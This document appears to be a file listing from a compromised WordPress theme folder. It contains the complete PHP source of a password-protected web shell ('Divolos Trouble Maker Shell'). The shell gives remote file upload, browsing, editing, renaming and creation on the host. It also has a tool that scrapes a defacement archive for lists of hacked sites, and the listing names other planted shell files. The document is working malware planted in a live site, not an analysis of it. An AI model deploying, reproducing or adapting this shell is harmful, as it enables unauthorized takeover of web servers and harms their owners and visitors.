PATH:
home
/
letacommog
/
laperouse
/
wp-content
/
themes
/
shell
<?php session_start(); ?> <?php error_reporting(0) ?> <?php /* #Shell Ini Dibuat Oleh Phenom #Divolos Trouble Maker #Recode? Jangan Hilangkan Nama Creator #Tinggal Pake Aja Apa susahnya? #~DTM2k20 @Instagram : @Maulanimir_Phenom; */ ?> <!-- Session L0g1n --> <?php $pass = "phenom"; function log1n(){ ?> <!DOCTYPE HTML> <meta name="viewport" content="width=device-width, initial-scale=1"> <html> <head> <title>DTM</title> <style type="text/css"> html { margin: 20px auto; background: #000000; color: green; text-align: center; } header { color: green; margin: 10px auto; } input[type=password] { width: 250px; height: 25px; color: red; background: transparent; border: 1px dotted green; margin-left: 20px; text-align: center; } </style> </head> <center> <header> <br><br><br><br><br> <h3>Divolos Trouble Maker $hell</h3> </header> <form method="post"> <input type="password" name="password"> </form> <?php exit;} if ($_POST['password']=='PhenoM') { session_start(); $_SESSION['pass'] = $_POST['password']; } if(isset($_SESSION['pass'])){ }else{ log1n(); } ?> <!-- Session L0g1n --> <!DOCTYPE html> <html> <head> <title>Phenom || DTM Sh3ll</title> <link href="http://fonts.googleapis.com/css?family=New Rocker|Jolly Lodger|Teko|Inconsolata" rel="stylesheet" type="text/css"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> .atasan{ color:white; text-shadow: 1px 1px 0px red,-1px -1px 0px blue; font-family: New Rocker; padding: 0; margin: 0; user-select: none; animation:jan 2s ease; animation-iteration-count: infinite; } .atasan2{ animation:ad 2s ease; animation-iteration-count: infinite; } .atasan3{ animation:da 2s ease; animation-iteration-count: infinite; } @keyframes jan{ 50% {color:black;text-shadow: none;} 100% {color:white;} } @keyframes ad{ 50% {color:black;text-shadow: none;} 100% {color:lime;} } @keyframes da{ 50% {color:black;text-shadow: none;} 100% {color:gold;} } .pertengah{ /*width: 50%;*/ overflow-wrap: break-word; text-align: left; font-family: Teko; letter-spacing: 2px; } hr{ border-color: white; } .aplot{ color:white; border: 1px solid white; padding: 2px; display:inline-block; } .path{ color:white; font-family: Inconsolata; } .pth{ color:red; text-decoration: none; } .tabel{ border-collapse: collapse; color:white; width: 100%; overflow-wrap: break-word; table-layout:fixed; } th,td{ border:1px solid red; } tr:hover{ background-color: green; } th:nth-child(1) { width: 50%; } th:nth-child(2) { width: 30%; } th:nth-child(3) { width: 20%; } td:nth-child(1) { width: 50%; } td:nth-child(2) { width: 30%; } td:nth-child(3) { width: 20%; } select{ width: 50px; } .linkfile{ text-decoration: none; color:white; font-family:Inconsolata; } .linkfile:hover{ color:gold; } /* =============== Scroll Bar By Phenom================ */ ::-webkit-scrollbar { width: 5px; height: 5px; background:rgba(255,255,255,0.1); overflow-x: hidden; } ::-webkit-scrollbar-track { box-shadow: inset 0 0 5px rgba(255,255,255,0.5); overflow-x: hidden; } ::-webkit-scrollbar-thumb { background:rgba(0,0,0,0.4); overflow-x: hidden; /*border-radius: 10px;*/ } ::-webkit-scrollbar-thumb:hover { background:rgba(0,0,0,0.8); overflow-x: hidden; /*border-radius: 10px;*/ } /* =============== Scroll Bar By Phenom================ */ .berhasil{ color:lime; font-family: inconsolata; } .gagal{ color:red; font-family: inconsolata; } .submat{ background-color: transparent; color:white; width: 50%; border:1px solid red; } .genjot{ background-color: transparent; color:white; width: 55px; text-align: center; border:1px solid red; } .genjot:hover{ background-color: black; } .genjotgrab{ background-color: transparent; color:white; width: 20%; text-align: center; border:1px solid red; } option{ background: black; } .aplodgenjot{ color:white; background-color: transparent; border:1px solid red; display:inline-block; padding:2px; } .submat:hover{ background-color: rgba(255,255,255,0.1); } .viewdit{ text-align:left;padding:0;margin:0; font-family: Teko; letter-spacing: 2px; cursor:default; } .medits{ text-decoration: none; color:lime; } .meditsa{ text-decoration: none; color:lime; font-family: inconsolata; } .medit{ color:red; text-decoration: none; } .areagrab{ border: 1px solid red; background-color: rgba(255,255,255,0.10); width:50%; padding:3px; color:white; text-align: left; overflow-x:auto; overflow-y: auto; } .areainputgrab{ background-color: rgba(255,255,255,0.1); border:1px solid red; color:red; } @media only screen and (max-width: 600px) { .genjotgrab{ background-color: transparent; color:white; width: 100%; text-align: center; border:1px solid red; } .areagrab{ border: 1px solid red; background-color: rgba(255,255,255,0.10); width:98%; padding:3px; color:white; text-align: left; overflow-x:auto; overflow-y: auto; } .areainputgrab{ background-color: rgba(255,255,255,0.1); border:1px solid red; width: 79.1%; } } </style> </head> <?php function bacaHTML($url){ // inisialisasi CURL $data = curl_init(); // setting CURL curl_setopt($data, CURLOPT_RETURNTRANSFER, 1); curl_setopt($data, CURLOPT_URL, $url); // menjalankan CURL untuk membaca isi file $hasil = curl_exec($data); curl_close($data); return $hasil; } ?> <body bgcolor="black"> <center> <h1 class="atasan"> <font color="lime" class="atasan2">Divolos </font> Trouble Maker <font color="gold" class="atasan3">Shell</font> </h1> <div class="pertengah"> <hr> <p style="color:white;padding: 0;margin: 0;">Your IP : <font color="lime"><?= $_SERVER['REMOTE_ADDR'] ?></font></p> <p style="color:white;padding: 0;margin: 0;">Web Server : <font color="lime"><?= $_SERVER['SERVER_SOFTWARE'] ?></font></p> <p style="color:white;padding: 0;margin: 0;">System : <font color="lime"><?= php_uname() ?></font></p> <?php if(!$_GET['act']||empty($_GET['act'])): ?> <hr> <center><font class="meditsa"> <?php $tool = ['XsecGrabber','TBPGrabber','MassNotify']; foreach($tool as $tools){ echo color(1,3,"[<a style='text-decoration:none;' href='?act=tool&toolname=".$tools."&path=".getcwd()."'>").color(1,2,$tools).color(1,3,"</a>] "); } ?> </font></center> <hr> <?php endif ?> </div> <?php /* #Part Yang Dibutuhkan */ $listdit = ['view','edit','rename','download','delete']; ?> <div class="path"> <?php if(isset($_GET['path'])){ $path = $_GET['path']; } else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); $pthas = str_replace('\\','/',$path); foreach ($paths as $key => $value) : if ($key === 0) : ?>Cur Dir => <a href="?path=<?= str_replace('\\','/',getcwd()); ?>" class="pth">*</a> <?php continue; endif; if($value == '') continue; echo ' / <a class="pth" href="?path='; for ($i = 0; $i <= $key; $i++){ echo $paths[$i]; if($key !== $i) echo '/'; } echo '">' . $value . '</a>'; endforeach; ?> </div> <!-- Warna --> <?php function color($bold = 1, $colorid = null, $string = null) { $color = array( "</font>", # 0 off "<font color='white'>", # 1 white "<font color='cyan'>", # 2 lime "<font color='lime'>", # 3 lime "<font color='red'>", # 4 red "<font color='gold'>", # 5 gold ); return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid]; } ?> <!-- Warna --> <div> <?php $dirinfo['view'] = $path.DIRECTORY_SEPARATOR.$_GET['filename']; // ambil data file $namaFile = $_FILES['inifile']['name']; $namaSementara = $_FILES['inifile']['tmp_name']; // tentukan lokasi file akan dipindahkan $dirUpload = $_GET['path']; #$dirUpload = ""; // pindahkan file $terupload = move_uploaded_file($namaSementara, $dirUpload.'/'.$namaFile); if(!empty($terupload)){ if ($terupload) { echo "Upload berhasil!<br/>"; // echo "Link: <a href='".$dirUpload.'/'.$namaFile."'>".$namaFile."</a>"; } else { echo "Upload Gagal!"; } } ?> <form method="post" enctype="multipart/form-data" class="aplodgenjot"> <input type="file" name="inifile"></input> <input type="submit" name="inisubmit" value="APLOT!" class="aplodgenjot" style="background-color: rgba(255,255,255,0.4);color:cyan;border-radius: 4px;"></input> </form> </div> <br> <div class="nggonfile"> <?php $scan = scandir($path); ?> <?php if((!$_GET['act'])||(empty($_GET['act']))): ?> <table class="tabel" cellpadding="4" cellspacing="4"> <thead> <tr> <th>Name</th> <th>Date</th> <th>Action</th> </tr> </thead> <tbody> <?php $gfolder = '<img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=">'; $gfile = '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=">'; echo "<tr><td style='border-right:none;'><a class='meditsa' href='https://www.instagram.com/maulanimir_phenom/' target='_blank'>Phenom</a></td> <td style=''>Create Dir/File</td> <td style='text-align:center;'><a class='genjot' href='?act=buatdir&path=$path' style='text-decoration:none;display:inline-block;width:53px;'>Dir</a> <a class='genjot' href='?act=buatfile&path=$path' style='text-decoration:none;display:inline-block;width:53px;'>File</a></td> </tr>"; foreach (array_diff($scan, array('.','..')) as $dir): if (is_dir($path . '/' . $dir)) :?> <?php $dirinfo['time'] = $path.DIRECTORY_SEPARATOR.$dir; ?> <tr> <td><?= $gfolder; ?><a class="linkfile" href="?path=<?= $path ?>/<?= $dir ?>"><?= $dir; ?></a></td> <td><?= date("F d Y H:i:s.",filectime($dirinfo['time'])) ?></td> <td style="text-align:center;"> <form method="post" action="?act=option<?= $action; ?>&path=<?= $path; ?>&dirname=<?= $dir; ?>"> <select name='act' class="genjot"> <option value="view">View</option> <option value="edit">Edit</option> <option value="delete">Delete</option> <option value="rename">Rename</option> <option value="download">Download</option> </select> <button type="submit" class="genjot">Gas!</button> </form> </td> </tr> <?php endif;endforeach;?> <?php foreach ($scan as $file): if (is_file($path . '/' . $file)) :?> <?php $dirinfo['time'] = $path.DIRECTORY_SEPARATOR.$file; ?> <tr> <td><?= $gfile?><a class="linkfile" href="?act=view&path=<?= $path ?>&filename=<?= $file ?>"><?= $file; ?></td> <td><?= date("F d Y H:i:s.",filectime($dirinfo['time'])) ?></td> <td style="text-align:center;"> <form method="post" action="?act=option<?= $action; ?>&path=<?= $path; ?>&filename=<?= $file; ?>"> <select name='act' class="genjot"> <option value="view">View</option> <option value="edit">Edit</option> <option value="delete">Delete</option> <option value="rename">Rename</option> <option value="download">Download</option> </select> <button type="submit" class="genjot">Gas!</button> </form> </td> </tr> <?php endif;endforeach;?> </tbody> </table> <?php //Grabber Zone-Xsec {Created by PHENOM} elseif(($_GET['act']==='tool') && ($_GET['toolname']==='XsecGrabber')): $arch = $_POST['archive']; $halaman = $_POST['halaman']; ?> <?php if((!$_GET['hasil'])||(empty($_GET['hasil']))):?> <form method="post" action="?act=tool&toolname=<?= $_GET['toolname'] ?>&path=<?= $path ?>&hasil=proses"> <select name="archive" class="genjotgrab"> <option value="archive">archive</option> <option value="onhold">onhold</option> <option value="special">special</option> <option value="attacker">attacker</option> <option value="team">team</option> </select> <br> <textarea class="areagrab" placeholder="Jumlah Halaman 1-50" name="halaman"></textarea> <br> <label style="color:red;font-family: Teko;letter-spacing: 2px;">Save File As </label> <input type="text"placeholder="Save As" name="namalistd" class="areainputgrab"></input> <input type="submit" name="submitgrab" class="genjotgrab"></input> <br> </form> <?php if($arch||$halaman == null){ // echo "<br>".color(1,4,"<font style='font-family:inconsolata;'>Isi Halamanya</font>"); exit; } ?> <?php elseif($_GET['hasil']==='proses'): for($ad=1;$ad<=$halaman;$ad++){ $halxsec = bacaHTML("https://zone-xsec.com/".$arch."/page=".$ad); $halxsec2 .= $halxsec; } $pecah = explode('<tr class="texw">',$halxsec2); $jumhal = $halaman*30; for($i=0;$i<=$jumhal;$i++){ $pecahlagi = explode('<td>',$pecah[$i]); $pecahan = str_replace('</td>','',$pecahlagi[6]) . "/"; $pecahan4 = substr($pecahan , 0, strpos($pecahan , '/')) ; $hasilpecahan .= $pecahan4."<br>"; } $daripecahan = explode("<br>",$hasilpecahan); $darpet = preg_replace('/\n/', '', $daripecahan); $daris = str_replace(' ','',$darpet); $wesdadi = array_filter($daris); foreach ($wesdadi as $wesdadis) { $listnya .= $wesdadis ." "; } $list = $_POST['namalistd']; $file = fopen($list.'.txt','w'); echo fwrite($file,$listnya); fclose($file); echo '~{<br><font color="green">Success Grabbed</font><font color="red"> '.count($wesdadi) .'</font><font color="purple">Website</font>'.'<br>File Disimpan Di <font color="red">'.$list.'.txt / </font>'.'<a href="'.$list.'.txt">Klick</a><br>}' ; echo "<br>"; ?> <?php /* Message From Phenom { Akhir Dari Grabber Xsec #Kalo Gabisa Buat Yauda Gausa maling #Tinggal Pake Aja Apa susahnya? @Instagram : @Maulanimir_Phenom; } */ endif; ?> <?php //Grabber TheBlackPapper {Created by PHENOM} elseif(($_GET['act']==='tool') && ($_GET['toolname']==='TBPGrabber')): echo "<script>alert('inprogress');document.location.href='?path=$path'</script>"; ?> <?php //MassNotifier (Xsec) {Created by PHENOM} elseif(($_GET['act']==='tool') && ($_GET['toolname']==='MassNotify')): echo "<script>alert('inprogress');document.location.href='?path=$path'</script>"; ?> <?php elseif(($_GET['act']==='buatdir')): echo "<form method='post'><input type='text' class='genjotgrab' name='membuat'placeholder='Buat Dir'></input><input type='submit' name='subsub'></input></form>"; $nama = $_POST['membuat']; if (mkdir($path . '/' . $nama)){ echo '<script>document.location.href = "?path=' . $path .'/'.$nama.'";</script>'; } ?> <?php elseif(($_GET['act']==='buatfile')): echo "<form method='post'><input type='text' class='genjotgrab' name='membuat'placeholder='Buat File' value='new.php'></input><input type='submit' name='subsub'></input></form>"; $namas = $_POST['membuat']; if(file_put_contents($path . '/' . $namas, $namas)){ echo '<script>document.location.href = "?act=view&path=' . $path . '&filename='.$namas.'";</script>'; } ?> <?php elseif (($_POST['act'])==='view'||($_GET['act'])==='view'):?> <?php $action = 'view'; ?> <h3 style="text-align:left;color:white;">View : <?= $_GET['filename']; ?><br><font color="lime"><?= $_GET['act'] ?> Mode</font></h3> <?php echo "<h4 class='viewdit'>"; foreach($listdit as $medit){ if($medit==$_GET['act']){ echo color(1,2,"[").color(1,4,"<a class='medits' href='?act=".$medit."&path=".$path."&filename=".$_GET['filename']."'>".$medit."</a>").color(1,2,"]").color(1,3," || "); } else{ echo color(1,2,"[").color(1,4,"<a class='medit' href='?act=".$medit."&path=".$path."&filename=".$_GET['filename']."'>".$medit."</a>").color(1,2,"]").color(1,3," || "); } } echo color(1,4," ~Phenom")."</h4>"; ?> <textarea readonly style="cursor:default;border: 1px solid red;background-color: rgba(255,255,255,0.10);padding:3px;width:100%;color:white;text-align: left;overflow-x:auto;overflow-y: auto;height: 400px;"><?=htmlspecialchars(@file_get_contents($dirinfo['view'])); ?></textarea> <?php elseif (($_GET['act']==='edit')||($_POST['act']==='edit')):?> <h3 style="text-align:left;color:white;">View : <?= $_GET['filename']; ?><br><font color="lime"><?= $_GET['act'] ?> Mode</font></h3> <?php echo "<h4 class='viewdit'>"; foreach($listdit as $medit){ if($medit==$_GET['act']){ echo color(1,2,"[").color(1,4,"<a class='medits' href='?act=".$medit."&path=".$path."&filename=".$_GET['filename']."'>".$medit."</a>").color(1,2,"]").color(1,3," || "); } else{ echo color(1,2,"[").color(1,4,"<a class='medit' href='?act=".$medit."&path=".$path."&filename=".$_GET['filename']."'>".$medit."</a>").color(1,2,"]").color(1,3," || "); } } echo color(1,4," ~Phenom")."</h4>"; ?> <?php if(isset($_POST['save'])) { $save = file_put_contents($path."/".$_GET['filename'], $_POST['src']); if($save!==false){ echo "<font class='berhasil'>Berhasil!</font>"; echo $save; } else{ echo "<font class='gagal'>Acces Denied!</font>"; } } ?> <form method="post"> <textarea name="src" style="border: 1px solid red;background-color: rgba(255,255,255,0.10);width:100%;padding:3px;color:white;text-align: left;overflow-x:auto;overflow-y: auto;height: 400px;"><?=htmlspecialchars(@file_get_contents($dirinfo['view'])); ?></textarea> <input class="submat" type="submit" name="save" value="save"></input> </form> <?php elseif (($_GET['act']==='rename')||($_POST['act']==='rename')): ?> <form method="post" action="?act=rename&path=<?= $path ?>&filename=<?= $_GET['filename'] ?>"> <input type="text" name="renames" class="genjotgrab" placeholder="Rubah Dengan Nama" value="<?= $_GET['filename'] ?>"></input> <button type="submit" class="genjot" style="width: 30%;">Gas!</button> </form> <?php $ubahnama = $_POST['renames']; if(rename($path."/".$_GET['filename'],$path."/".$ubahnama)){ echo "<script>window.location.href='?act=view&path=".$path."&filename=".$ubahnama."'</script>"; }; ?> <?php endif ?> </div> </center> </body> </html>
[+]
..
[-] index.php
[edit]
[-] style.css
[edit]
[-] pshell.php
[edit]
[-] tmpltwin.php.suspected
[edit]
[-] marjanlgx.php.suspected
[edit]